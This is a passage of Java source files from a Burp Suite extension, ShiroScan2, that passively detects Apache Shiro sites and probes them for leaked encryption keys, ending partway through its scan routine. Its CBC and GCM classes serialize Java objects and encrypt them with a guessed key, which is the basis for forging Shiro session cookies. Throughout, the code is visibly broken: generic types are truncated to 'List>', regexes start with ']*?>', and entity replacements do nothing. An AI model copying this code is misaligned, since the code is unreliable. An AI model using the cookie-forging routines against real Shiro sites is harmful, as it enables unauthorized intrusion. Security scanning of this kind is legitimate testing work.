--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/CustomBurpHelpers.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.io.File;
4 | import java.io.UnsupportedEncodingException;
5 |
6 | import burp.*;
7 |
8 | public class CustomBurpHelpers {
9 | private IBurpExtenderCallbacks callbacks;
10 | private IExtensionHelpers helpers;
11 |
12 | public CustomBurpHelpers(IBurpExtenderCallbacks callbacks) {
13 | this.callbacks = callbacks;
14 | this.helpers = callbacks.getHelpers();
15 | }
16 |
17 | /**
18 | * 获取-插件运行路径
19 | *
20 | * @return
21 | */
22 | public String getExtensionFilePath() {
23 | String path = "";
24 | Integer lastIndex = this.callbacks.getExtensionFilename().lastIndexOf(File.separator);
25 | path = this.callbacks.getExtensionFilename().substring(0, lastIndex) + File.separator;
26 | return path;
27 | }
28 |
29 | /**
30 | * 获取请求的Body内容
31 | *
32 | * @return String
33 | */
34 | public String getHttpRequestBody(byte[] request) {
35 | IRequestInfo requestInfo = this.helpers.analyzeRequest(request);
36 |
37 | int httpRequestBodyOffset = requestInfo.getBodyOffset();
38 | int httpRequestBodyLength = request.length - httpRequestBodyOffset;
39 |
40 | String httpRequestBody = null;
41 | try {
42 | httpRequestBody = new String(request, httpRequestBodyOffset, httpRequestBodyLength, "UTF-8");
43 | } catch (UnsupportedEncodingException e) {
44 | throw new RuntimeException(e);
45 | }
46 | return httpRequestBody;
47 | }
48 |
49 | /**
50 | * 获取响应的Body内容
51 | *
52 | * @return String
53 | */
54 | public String getHttpResponseBody(byte[] response) {
55 | IResponseInfo responseInfo = this.helpers.analyzeResponse(response);
56 |
57 | int httpResponseBodyOffset = responseInfo.getBodyOffset();
58 | int httpResponseBodyLength = response.length - httpResponseBodyOffset;
59 |
60 | String httpResponseBody = null;
61 | try {
62 | httpResponseBody = new String(response, httpResponseBodyOffset, httpResponseBodyLength, "UTF-8");
63 | } catch (UnsupportedEncodingException e) {
64 | throw new RuntimeException(e);
65 | }
66 | return httpResponseBody;
67 | }
68 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/CustomBurpUrl.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.net.URL;
4 | import java.io.PrintWriter;
5 | import java.net.MalformedURLException;
6 |
7 | import burp.IExtensionHelpers;
8 | import burp.IHttpRequestResponse;
9 | import burp.IBurpExtenderCallbacks;
10 |
11 | public class CustomBurpUrl {
12 | private IBurpExtenderCallbacks callbacks;
13 | private IExtensionHelpers helpers;
14 |
15 | public PrintWriter stderr;
16 |
17 | private IHttpRequestResponse requestResponse;
18 |
19 | public CustomBurpUrl(IBurpExtenderCallbacks callbacks, IHttpRequestResponse requestResponse) {
20 | this.callbacks = callbacks;
21 | this.helpers = callbacks.getHelpers();
22 | this.stderr = new PrintWriter(callbacks.getStderr(), true);
23 |
24 | this.requestResponse = requestResponse;
25 | }
26 |
27 | public IHttpRequestResponse requestResponse() {
28 | return this.requestResponse;
29 | }
30 |
31 | /**
32 | * 获取-请求协议
33 | *
34 | * @return
35 | */
36 | public String getRequestProtocol() {
37 | return this.requestResponse.getHttpService().getProtocol();
38 | }
39 |
40 | /**
41 | * 获取-请求主机
42 | *
43 | * @return
44 | */
45 | public String getRequestHost() {
46 | return this.requestResponse.getHttpService().getHost();
47 | }
48 |
49 | /**
50 | * 获取-请求端口
51 | *
52 | * @return
53 | */
54 | public int getRequestPort() {
55 | return this.requestResponse.getHttpService().getPort();
56 | }
57 |
58 | /**
59 | * 获取-请求路径
60 | *
61 | * @return
62 | */
63 | public String getRequestPath() {
64 | return this.helpers.analyzeRequest(this.requestResponse).getUrl().getPath();
65 | }
66 |
67 | /**
68 | * 获取-请求参数
69 | *
70 | * @return
71 | */
72 | public String getRequestQuery() {
73 | return this.helpers.analyzeRequest(this.requestResponse).getUrl().getQuery();
74 | }
75 |
76 | /**
77 | * 获取-请求域名名称
78 | *
79 | * @return
80 | */
81 | public String getRequestDomainName() {
82 | if (this.getRequestPort() == 80 || this.getRequestPort() == 443) {
83 | return this.getRequestProtocol() + "://" + this.getRequestHost();
84 | } else {
85 | return this.getRequestProtocol() + "://" + this.getRequestHost() + ":" + this.getRequestPort();
86 | }
87 | }
88 |
89 | /**
90 | * 获取-获取http请求url
91 | *
92 | * @return
93 | */
94 | public URL getHttpRequestUrl() {
95 | try {
96 | if (this.getRequestQuery() == null) {
97 | return new URL(this.getRequestDomainName() + this.getRequestPath());
98 | } else {
99 | return new URL(this.getRequestDomainName() + this.getRequestPath() + "?" + this.getRequestQuery());
100 | }
101 | } catch (MalformedURLException e) {
102 | e.printStackTrace(this.stderr);
103 | }
104 | return null;
105 | }
106 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/CustomHelpers.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.util.ArrayList;
4 | import java.util.Date;
5 | import java.util.List;
6 |
7 | public class CustomHelpers {
8 | /**
9 | * 获取精确到秒的时间戳
10 | *
11 | * @param date
12 | * @return Integer
13 | */
14 | public static Integer getSecondTimestamp(Date date) {
15 | if (null == date) {
16 | return 0;
17 | }
18 | String timestamp = String.valueOf(date.getTime() / 1000);
19 | return Integer.valueOf(timestamp);
20 | }
21 |
22 | /**
23 | * 列表块分割函数
24 | * 功能: 把列表按照size分割成指定的list快返回
25 | * 例子1:
26 | * a = [1, 2, 3, 4, 5, 6, 7, 8, 9]
27 | * listChunkSplit(a, 2)
28 | * 返回: [[1, 2, 3, 4, 5], [6, 7, 8, 9]]
29 | * 例子2:
30 | * a = [1, 2, 3, 4, 5, 6, 7, 8, 9]
31 | * listChunkSplit(a, 10)
32 | * 返回: [[1], [2], [3], [4], [5], [6], [7], [8], [9]]
33 | *
34 | * @param dataSource 数据源
35 | * @param groupSize 一个整数, 规定最多分成几个list
36 | * @return List>
37 | */
38 | public static List> listChunkSplit(List dataSource, Integer groupSize) {
39 | List> result = new ArrayList<>();
40 |
41 | if (dataSource.size() == 0 || groupSize == 0) {
42 | return result;
43 | }
44 |
45 | // 偏移量
46 | int offset = 0;
47 |
48 | // 计算 商
49 | int number = dataSource.size() / groupSize;
50 |
51 | // 计算 余数
52 | int remainder = dataSource.size() % groupSize;
53 |
54 | for (int i = 0; i < groupSize; i++) {
55 | List value = null;
56 | if (remainder > 0) {
57 | value = dataSource.subList(i * number + offset, (i + 1) * number + offset + 1);
58 | remainder--;
59 | offset++;
60 | } else {
61 | value = dataSource.subList(i * number + offset, (i + 1) * number + offset);
62 | }
63 |
64 | if (value.size() == 0) {
65 | break;
66 | }
67 |
68 | result.add(value);
69 | }
70 |
71 | return result;
72 | }
73 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/DiffPage.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | public class DiffPage {
4 | /**
5 | * 返回经过过滤无用的数据以后两个字符串的相似度
6 | *
7 | * @param str
8 | * @param target
9 | * @return
10 | */
11 | public static double getRatio(String str, String target) {
12 | str = getFilteredPageContent(str);
13 | target = getFilteredPageContent(target);
14 | return getSimilarityRatio(str, target);
15 | }
16 |
17 | /**
18 | * 返回经过过滤的页面内容,不包含脚本、样式和/或注释
19 | * 或所有HTML标签
20 | * 调用 getFilteredPageContent("foobartest")
21 | * 返回内容: foobartest
22 | *
23 | * @param htmlStr
24 | * @return String
25 | */
26 | public static String getFilteredPageContent(String htmlStr) {
27 | // 将实体字符串转义返回 如: "<"="<", ">"=">", """="\"", " "=" ", "&"="&"
28 | htmlStr = htmlStr.replace("<", "<");
29 | htmlStr = htmlStr.replace(">", ">");
30 | htmlStr = htmlStr.replace(""", "\"");
31 | htmlStr = htmlStr.replace(" ", " ");
32 | htmlStr = htmlStr.replace("&", "&");
33 |
34 | //定义script的正则表达式,去除js可以防止注入
35 | String scriptRegex = "]*?>[\\s\\S]*?<\\/script>";
36 | //定义style的正则表达式,去除style样式,防止css代码过多时只截取到css样式代码
37 | String styleRegex = "]*?>[\\s\\S]*?<\\/style>";
38 | //定义HTML标签的正则表达式,去除标签,只提取文字内容
39 | String htmlRegex = "<[^>]+>";
40 | // 定义一些特殊字符的正则表达式 如:
41 | String specialRegex1 = "\\&[a-zA-Z]{1,10};";
42 | // 定义一些特殊字符的正则表达式 如:
43 | String specialRegex2 = "\\&#[a-zA-Z0-9]{1,10};";
44 | //定义空格,回车,换行符,制表符
45 | String spaceRegex = "\\s*|\t|\r|\n";
46 |
47 | // 过滤script标签
48 | htmlStr = htmlStr.replaceAll(scriptRegex, "");
49 | // 过滤style标签
50 | htmlStr = htmlStr.replaceAll(styleRegex, "");
51 | // 过滤html标签
52 | htmlStr = htmlStr.replaceAll(htmlRegex, "");
53 | // 去除特殊字符
54 | htmlStr = htmlStr.replaceAll(specialRegex1, "");
55 | htmlStr = htmlStr.replaceAll(specialRegex2, "");
56 | // 过滤空格等
57 | htmlStr = htmlStr.replaceAll(spaceRegex, "");
58 |
59 | return htmlStr.trim();
60 | }
61 |
62 | /**
63 | * 两个字符串相似度匹配
64 | *
65 | * @param str
66 | * @param target
67 | * @return double
68 | */
69 | public static double getSimilarityRatio(String str, String target) {
70 | if (str.equals(target)) {
71 | return 1;
72 | }
73 |
74 | int d[][]; // 矩阵
75 | int n = str.length();
76 | int m = target.length();
77 | int i; // 遍历str的
78 | int j; // 遍历target的
79 | char ch1; // str的
80 | char ch2; // target的
81 | int temp; // 记录相同字符,在某个矩阵位置值的增量,不是0就是1
82 | if (n == 0 || m == 0) {
83 | return 0;
84 | }
85 | d = new int[n + 1][m + 1];
86 | // 初始化第一列
87 | for (i = 0; i <= n; i++) {
88 | d[i][0] = i;
89 | }
90 |
91 | // 初始化第一行
92 | for (j = 0; j <= m; j++) {
93 | d[0][j] = j;
94 | }
95 |
96 | // 遍历str
97 | for (i = 1; i <= n; i++) {
98 | ch1 = str.charAt(i - 1);
99 | // 去匹配target
100 | for (j = 1; j <= m; j++) {
101 | ch2 = target.charAt(j - 1);
102 | if (ch1 == ch2 || ch1 == ch2 + 32 || ch1 + 32 == ch2) {
103 | temp = 0;
104 | } else {
105 | temp = 1;
106 | }
107 | // 左边+1,上边+1, 左上角+temp取最小
108 | d[i][j] = Math.min(Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1), d[i - 1][j - 1] + temp);
109 | }
110 | }
111 |
112 | return (1 - (double) d[n][m] / Math.max(str.length(), target.length()));
113 | }
114 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/Encrypt/CbcEncrypt.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap.Encrypt;
2 |
3 | import org.apache.shiro.codec.Base64;
4 | import org.apache.shiro.crypto.AesCipherService;
5 | import org.apache.shiro.util.ByteSource;
6 |
7 | import java.io.ByteArrayOutputStream;
8 | import java.io.IOException;
9 | import java.io.ObjectOutputStream;
10 |
11 | public class CbcEncrypt implements EncryptInterface {
12 | @Override
13 | public String getName() {
14 | return "cbc";
15 | }
16 |
17 | @Override
18 | public byte[] getBytes(Object obj) throws IOException {
19 | ByteArrayOutputStream byteArrayOutputStream = null;
20 | ObjectOutputStream objectOutputStream = null;
21 | byteArrayOutputStream = new ByteArrayOutputStream();
22 | objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
23 | objectOutputStream.writeObject(obj);
24 | objectOutputStream.flush();
25 | return byteArrayOutputStream.toByteArray();
26 | }
27 |
28 | @Override
29 | public String encrypt(String key, byte[] objectBytes) {
30 | byte[] keyDecode = Base64.decode(key);
31 | AesCipherService cipherService = new AesCipherService();
32 | ByteSource byteSource = cipherService.encrypt(objectBytes, keyDecode);
33 | byte[] value = byteSource.getBytes();
34 | return new String(Base64.encode(value));
35 | }
36 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/Encrypt/EncryptInterface.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap.Encrypt;
2 |
3 | import java.io.IOException;
4 |
5 | public interface EncryptInterface {
6 | byte[] getBytes(Object obj) throws IOException;
7 |
8 | String encrypt(String key, byte[] objectBytes);
9 |
10 | String getName();
11 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/Encrypt/GcmEncrypt.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap.Encrypt;
2 |
3 | import org.apache.shiro.codec.Base64;
4 |
5 | import javax.crypto.Cipher;
6 | import javax.crypto.spec.GCMParameterSpec;
7 | import javax.crypto.spec.SecretKeySpec;
8 | import java.io.ByteArrayOutputStream;
9 | import java.io.IOException;
10 | import java.io.ObjectOutputStream;
11 | import java.security.NoSuchAlgorithmException;
12 | import java.security.SecureRandom;
13 |
14 | public class GcmEncrypt implements EncryptInterface {
15 | @Override
16 | public String getName() {
17 | return "gcm";
18 | }
19 |
20 | @Override
21 | public byte[] getBytes(Object obj) throws IOException {
22 | ByteArrayOutputStream byteArrayOutputStream = null;
23 | ObjectOutputStream objectOutputStream = null;
24 | byteArrayOutputStream = new ByteArrayOutputStream();
25 | objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
26 | objectOutputStream.writeObject(obj);
27 | objectOutputStream.flush();
28 | return byteArrayOutputStream.toByteArray();
29 | }
30 |
31 | @Override
32 | public String encrypt(String key, byte[] payload) {
33 | try {
34 | byte[] raw = Base64.decode(key);
35 | byte[] ivs = generateInitializationVector();
36 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
37 | Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
38 | GCMParameterSpec iv = new GCMParameterSpec(128, ivs);
39 | cipher.init(1, skeySpec, iv);
40 | byte[] encrypted = cipher.doFinal(pad(payload));
41 | return new String(Base64.encode(byteMerger(ivs, encrypted)));
42 | } catch (Exception exception) {
43 | return "0";
44 | }
45 | }
46 |
47 | private static SecureRandom secureRandom;
48 |
49 | private static int initializationVectorSize = 128;
50 |
51 | private static byte[] pad(byte[] s) {
52 | s = byteMerger(s, charToByte((char) (16 - s.length % 16)));
53 | return s;
54 | }
55 |
56 | private static byte[] charToByte(char c) {
57 | byte[] b = new byte[2];
58 | b[0] = (byte) ((c & 0xFF00) >> 8);
59 | b[1] = (byte) (c & 0xFF);
60 | return b;
61 | }
62 |
63 | private static byte[] byteMerger(byte[] bt1, byte[] bt2) {
64 | byte[] bt3 = new byte[bt1.length + bt2.length];
65 | System.arraycopy(bt1, 0, bt3, 0, bt1.length);
66 | System.arraycopy(bt2, 0, bt3, bt1.length, bt2.length);
67 | return bt3;
68 | }
69 |
70 | private static byte[] generateInitializationVector() {
71 | int size = getInitializationVectorSize();
72 | int sizeInBytes = size / 8;
73 | byte[] ivBytes = new byte[sizeInBytes];
74 | SecureRandom random = ensureSecureRandom();
75 | random.nextBytes(ivBytes);
76 | return ivBytes;
77 | }
78 |
79 | private static SecureRandom ensureSecureRandom() {
80 | SecureRandom random = getSecureRandom();
81 | if (random == null)
82 | random = getDefaultSecureRandom();
83 | return random;
84 | }
85 |
86 | private static SecureRandom getSecureRandom() {
87 | return secureRandom;
88 | }
89 |
90 | private static SecureRandom getDefaultSecureRandom() {
91 | try {
92 | return SecureRandom.getInstance("SHA1PRNG");
93 | } catch (NoSuchAlgorithmException e) {
94 | return new SecureRandom();
95 | }
96 | }
97 |
98 | private static int getInitializationVectorSize() {
99 | return initializationVectorSize;
100 | }
101 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/GlobalPassiveScanVariableReader.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.util.Map;
4 | import java.util.concurrent.ConcurrentHashMap;
5 |
6 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.IShiroCipherKeyExtension;
7 |
8 | /**
9 | * 专门拿来做被动扫描器变量共享的类
10 | */
11 | public class GlobalPassiveScanVariableReader {
12 | private ConcurrentHashMap booleanMap;
13 | private ConcurrentHashMap shiroCipherKeyExtensioMap;
14 |
15 | public GlobalPassiveScanVariableReader() {
16 | this.booleanMap = new ConcurrentHashMap();
17 | this.shiroCipherKeyExtensioMap = new ConcurrentHashMap();
18 | }
19 |
20 | public Map getBooleanMap() {
21 | return this.booleanMap;
22 | }
23 |
24 | public Boolean getBooleanData(String key) {
25 | return this.getBooleanMap().get(key);
26 | }
27 |
28 | public void putBooleanData(String key, Boolean b) {
29 | if (key == null || key.length() <= 0) {
30 | throw new IllegalArgumentException("key不能为空");
31 | }
32 |
33 | synchronized (this.getBooleanMap()) {
34 | this.getBooleanMap().put(key, b);
35 | }
36 | }
37 |
38 | public void delBooleanData(String key) {
39 | if (this.getBooleanMap().get(key) != null) {
40 | this.getBooleanMap().remove(key);
41 | }
42 | }
43 |
44 | public Map getShiroCipherKeyExtensioMap() {
45 | return this.shiroCipherKeyExtensioMap;
46 | }
47 |
48 | public IShiroCipherKeyExtension getShiroCipherKeyExtensionData(String key) {
49 | return this.getShiroCipherKeyExtensioMap().get(key);
50 | }
51 |
52 | public void putShiroCipherKeyExtensionData(String key, IShiroCipherKeyExtension b) {
53 | if (key == null || key.length() <= 0) {
54 | throw new IllegalArgumentException("key不能为空");
55 | }
56 |
57 | synchronized (this.getShiroCipherKeyExtensioMap()) {
58 | this.getShiroCipherKeyExtensioMap().put(key, b);
59 | }
60 | }
61 |
62 | public void delShiroCipherKeyExtensionData(String key) {
63 | if (this.getShiroCipherKeyExtensioMap().get(key) != null) {
64 | this.getShiroCipherKeyExtensioMap().remove(key);
65 | }
66 | }
67 | }
68 |
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/GlobalVariableReader.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.util.Map;
4 | import java.util.concurrent.ConcurrentHashMap;
5 |
6 | /**
7 | * 专门拿来做插件的全局变量共享的类
8 | */
9 | public class GlobalVariableReader {
10 | private ConcurrentHashMap booleanMap;
11 |
12 | public GlobalVariableReader() {
13 | this.booleanMap = new ConcurrentHashMap();
14 | }
15 |
16 | public Map getBooleanMap() {
17 | return this.booleanMap;
18 | }
19 |
20 | public Boolean getBooleanData(String key) {
21 | return this.getBooleanMap().get(key);
22 | }
23 |
24 | public void putBooleanData(String key, Boolean b) {
25 | if (key == null || key.length() <= 0) {
26 | throw new IllegalArgumentException("key不能为空");
27 | }
28 |
29 | synchronized (this.getBooleanMap()) {
30 | this.getBooleanMap().put(key, b);
31 | }
32 | }
33 |
34 | public void delBooleanData(String key) {
35 | if (this.getBooleanMap().get(key) != null) {
36 | this.getBooleanMap().remove(key);
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Bootstrap/YamlReader.java:
--------------------------------------------------------------------------------
1 | package burp.Bootstrap;
2 |
3 | import java.util.Map;
4 | import java.util.List;
5 | import java.util.HashMap;
6 | import java.util.LinkedHashMap;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileNotFoundException;
10 | import java.io.PrintWriter;
11 |
12 | import org.yaml.snakeyaml.Yaml;
13 |
14 | import burp.IBurpExtenderCallbacks;
15 |
16 | public class YamlReader {
17 | private static YamlReader instance;
18 |
19 | private static Map> properties = new HashMap<>();
20 |
21 | private YamlReader(IBurpExtenderCallbacks callbacks) throws FileNotFoundException {
22 | CustomBurpHelpers customBurpHelpers = new CustomBurpHelpers(callbacks);
23 | String c = customBurpHelpers.getExtensionFilePath() + "resources/config.yml";
24 | File f = new File(c);
25 | properties = new Yaml().load(new FileInputStream(f));
26 | }
27 |
28 | public static synchronized YamlReader getInstance(IBurpExtenderCallbacks callbacks) {
29 | if (instance == null) {
30 | try {
31 | instance = new YamlReader(callbacks);
32 | } catch (FileNotFoundException e) {
33 | e.printStackTrace(new PrintWriter(callbacks.getStderr(), true));
34 | }
35 | }
36 | return instance;
37 | }
38 |
39 | /**
40 | * 获取yaml属性
41 | * 可通过 "." 循环调用
42 | * 例如这样调用: YamlReader.getInstance().getValueByKey("a.b.c.d")
43 | *
44 | * @param key
45 | * @return
46 | */
47 | public Object getValueByKey(String key) {
48 | String separator = ".";
49 | String[] separatorKeys = null;
50 | if (key.contains(separator)) {
51 | separatorKeys = key.split("\\.");
52 | } else {
53 | return properties.get(key);
54 | }
55 | Map> finalValue = new HashMap<>();
56 | for (int i = 0; i < separatorKeys.length - 1; i++) {
57 | if (i == 0) {
58 | finalValue = (Map) properties.get(separatorKeys[i]);
59 | continue;
60 | }
61 | if (finalValue == null) {
62 | break;
63 | }
64 | finalValue = (Map) finalValue.get(separatorKeys[i]);
65 | }
66 | return finalValue == null ? null : finalValue.get(separatorKeys[separatorKeys.length - 1]);
67 | }
68 |
69 | public String getString(String key) {
70 | return String.valueOf(this.getValueByKey(key));
71 | }
72 |
73 | public String getString(String key, String defaultValue) {
74 | if (null == this.getValueByKey(key)) {
75 | return defaultValue;
76 | }
77 | return String.valueOf(this.getValueByKey(key));
78 | }
79 |
80 | public Boolean getBoolean(String key) {
81 | return (boolean) this.getValueByKey(key);
82 | }
83 |
84 | public Integer getInteger(String key) {
85 | return (Integer) this.getValueByKey(key);
86 | }
87 |
88 | public double getDouble(String key) {
89 | return (double) this.getValueByKey(key);
90 | }
91 |
92 | public List getStringList(String key) {
93 | return (List) this.getValueByKey(key);
94 | }
95 |
96 | public LinkedHashMap getLinkedHashMap(String key) {
97 | return (LinkedHashMap) this.getValueByKey(key);
98 | }
99 | }
--------------------------------------------------------------------------------
/src/main/java/burp/BurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.net.URL;
4 | import java.util.List;
5 | import java.util.Arrays;
6 | import java.util.ArrayList;
7 | import java.io.PrintWriter;
8 |
9 | import burp.Ui.Tags;
10 |
11 | import burp.Bootstrap.YamlReader;
12 | import burp.Bootstrap.CustomBurpUrl;
13 | import burp.Bootstrap.GlobalVariableReader;
14 | import burp.Bootstrap.GlobalPassiveScanVariableReader;
15 |
16 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;
17 |
18 | import burp.Application.ShiroCipherKeyExtension.ShiroCipherKeyThread;
19 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.IShiroCipherKeyExtension;
20 |
21 | public class BurpExtender implements IBurpExtender, IScannerCheck, IExtensionStateListener {
22 | public static String NAME = "ShiroScan2";
23 | public static String VERSION = "2.0.0";
24 |
25 | private GlobalVariableReader globalVariableReader;
26 |
27 | public static IBurpExtenderCallbacks callbacks;
28 | public static IExtensionHelpers helpers;
29 |
30 | private PrintWriter stdout;
31 | private PrintWriter stderr;
32 |
33 | private Tags tags;
34 |
35 | private YamlReader yamlReader;
36 |
37 | @Override
38 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
39 | this.callbacks = callbacks;
40 | this.helpers = callbacks.getHelpers();
41 |
42 | this.stdout = new PrintWriter(callbacks.getStdout(), true);
43 | this.stderr = new PrintWriter(callbacks.getStderr(), true);
44 |
45 | // 全局变量的数据保存地址
46 | // 用于在程序执行的过程中能够实时的修改变量数据使用
47 | this.globalVariableReader = new GlobalVariableReader();
48 |
49 | // 是否卸载扩展
50 | // 用于卸载插件以后,把程序快速退出去,避免卡顿
51 | // true = 已被卸载, false = 未卸载
52 | this.globalVariableReader.putBooleanData("isExtensionUnload", false);
53 |
54 | // 标签界面
55 | this.tags = new Tags(callbacks, NAME);
56 |
57 | // 配置文件
58 | this.yamlReader = YamlReader.getInstance(callbacks);
59 |
60 | callbacks.setExtensionName(NAME);
61 | callbacks.registerScannerCheck(this);
62 | callbacks.registerContextMenuFactory(new Menu());
63 | callbacks.registerExtensionStateListener(this);
64 |
65 | // 基本信息输出
66 | // 作者拿来臭美用的 ╰(*°▽°*)╯
67 | this.stdout.println(basicInformationOutput());
68 | }
69 |
70 | /**
71 | * 基本信息输出
72 | */
73 | private static String basicInformationOutput() {
74 | String str1 = "===================================\n";
75 | String str2 = String.format("%s Load the success\n", NAME);
76 | String str3 = String.format("VERSION: %s\n", VERSION);
77 | String str4 = "author: pmiaowu\n";
78 | String str5 = "QQ: 3303003493\n";
79 | String str6 = "WeChat: a3303003493\n";
80 | String str7 = "GitHub: https://github.com/pmiaowu\n";
81 | String str8 = "Blog: https://www.yuque.com/pmiaowu\n";
82 | String str9 = String.format("downloadLink: %s\n", "https://github.com/pmiaowu/BurpShiroPassiveScan");
83 | String str10 = "===================================\n";
84 | String detail = str1 + str2 + str3 + str4 + str5 + str6 + str7 + str8 + str9 + str10;
85 | return detail;
86 | }
87 |
88 | @Override
89 | public List doPassiveScan(IHttpRequestResponse baseRequestResponse) {
90 | // 被动扫描器变量共享的数据保存地址
91 | // 用于在程序执行的过程中能够实时的修改变量数据使用
92 | GlobalPassiveScanVariableReader globalPassiveScanVariableReader = new GlobalPassiveScanVariableReader();
93 |
94 | List issues = new ArrayList<>();
95 |
96 | List domainNameBlacklist = this.yamlReader.getStringList("scan.domainName.blacklist");
97 | List domainNameWhitelist = this.yamlReader.getStringList("scan.domainName.whitelist");
98 |
99 | // 基础url解析
100 | CustomBurpUrl baseBurpUrl = new CustomBurpUrl(this.callbacks, baseRequestResponse);
101 |
102 | // 消息等级-用于插件扫描队列界面的显示
103 | String messageLevel = this.yamlReader.getString("messageLevel");
104 |
105 | // 判断是否开启插件
106 | if (!this.tags.getBaseSettingTagClass().isStart()) {
107 | return null;
108 | }
109 |
110 | // 判断域名黑名单
111 | if (domainNameBlacklist != null && domainNameBlacklist.size() >= 1) {
112 | if (isMatchDomainName(baseBurpUrl.getRequestHost(), domainNameBlacklist)) {
113 | return null;
114 | }
115 | }
116 |
117 | // 判断域名白名单
118 | if (domainNameWhitelist != null && domainNameWhitelist.size() >= 1) {
119 | if (!isMatchDomainName(baseBurpUrl.getRequestHost(), domainNameWhitelist)) {
120 | return null;
121 | }
122 | }
123 |
124 | // 判断当前请求后缀,是否为url黑名单后缀
125 | if (this.isUrlBlackListSuffix(baseBurpUrl)) {
126 | return null;
127 | }
128 |
129 | // 判断当前站点是否超出扫描数量了
130 | Integer siteScanNumber = this.yamlReader.getInteger("scan.siteScanNumber");
131 | if (siteScanNumber != 0) {
132 | Integer siteNumber = this.getSiteNumber(baseBurpUrl.getRequestDomainName());
133 | if (siteNumber >= siteScanNumber) {
134 | if (messageLevel.equals("ALL")) {
135 | this.tags.getScanQueueTagClass().add(
136 | "",
137 | "",
138 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
139 | baseBurpUrl.getHttpRequestUrl().toString(),
140 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
141 | "the number of website scans exceeded",
142 | baseRequestResponse
143 | );
144 | }
145 | return null;
146 | }
147 | }
148 |
149 | // 判断当前站点的shiro指纹问题数量是否超出了
150 | Integer shiroFingerprintScanIssueNumber = this.yamlReader.getInteger("application.shiroFingerprintExtension.config.issueNumber");
151 | if (shiroFingerprintScanIssueNumber != 0) {
152 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName");
153 | Integer shiroFingerprintIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroFingerprintIssueName);
154 | if (shiroFingerprintIssueNumber >= shiroFingerprintScanIssueNumber) {
155 | if (messageLevel.equals("ALL")) {
156 | this.tags.getScanQueueTagClass().add(
157 | "",
158 | "",
159 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
160 | baseBurpUrl.getHttpRequestUrl().toString(),
161 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
162 | "shiro fingerprint problems have exceeded the number",
163 | baseRequestResponse
164 | );
165 | }
166 | return null;
167 | }
168 | }
169 |
170 | // 判断当前站点的shiro加密key问题数量是否超出了
171 | Integer shiroCipherKeyScanIssueNumber = this.yamlReader.getInteger("application.shiroCipherKeyExtension.config.issueNumber");
172 | if (shiroCipherKeyScanIssueNumber != 0) {
173 | String shiroCipherKeyIssueName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.issueName");
174 | Integer shiroCipherKeyIssueNumber = this.getSiteIssueNumber(baseBurpUrl.getRequestDomainName(), shiroCipherKeyIssueName);
175 | if (shiroCipherKeyIssueNumber >= shiroCipherKeyScanIssueNumber) {
176 | if (messageLevel.equals("ALL")) {
177 | this.tags.getScanQueueTagClass().add(
178 | "",
179 | "",
180 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
181 | baseBurpUrl.getHttpRequestUrl().toString(),
182 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
183 | "shiro encryption key leakage problems have exceeded the number",
184 | baseRequestResponse
185 | );
186 | }
187 | return null;
188 | }
189 | }
190 |
191 | // shiro指纹探测扩展
192 | ShiroFingerprint shiroFingerprint = new ShiroFingerprint(this.callbacks, this.yamlReader, baseRequestResponse);
193 |
194 | // 判断指纹模块是否正常
195 | if (!shiroFingerprint.run().isRunExtension()) {
196 | this.tags.getScanQueueTagClass().add(
197 | "",
198 | "",
199 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
200 | baseBurpUrl.getHttpRequestUrl().toString(),
201 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
202 | "shiro fingerprint module startup error",
203 | baseRequestResponse
204 | );
205 | return null;
206 | }
207 |
208 | // 检测是否shiro框架
209 | if (!shiroFingerprint.run().isShiroFingerprint()) {
210 | if (messageLevel.equals("ALL")) {
211 | this.tags.getScanQueueTagClass().add(
212 | "",
213 | "",
214 | this.helpers.analyzeRequest(baseRequestResponse).getMethod(),
215 | baseBurpUrl.getHttpRequestUrl().toString(),
216 | this.helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode() + "",
217 | "the site is not a shiro framework",
218 | baseRequestResponse
219 | );
220 | }
221 | return null;
222 | }
223 |
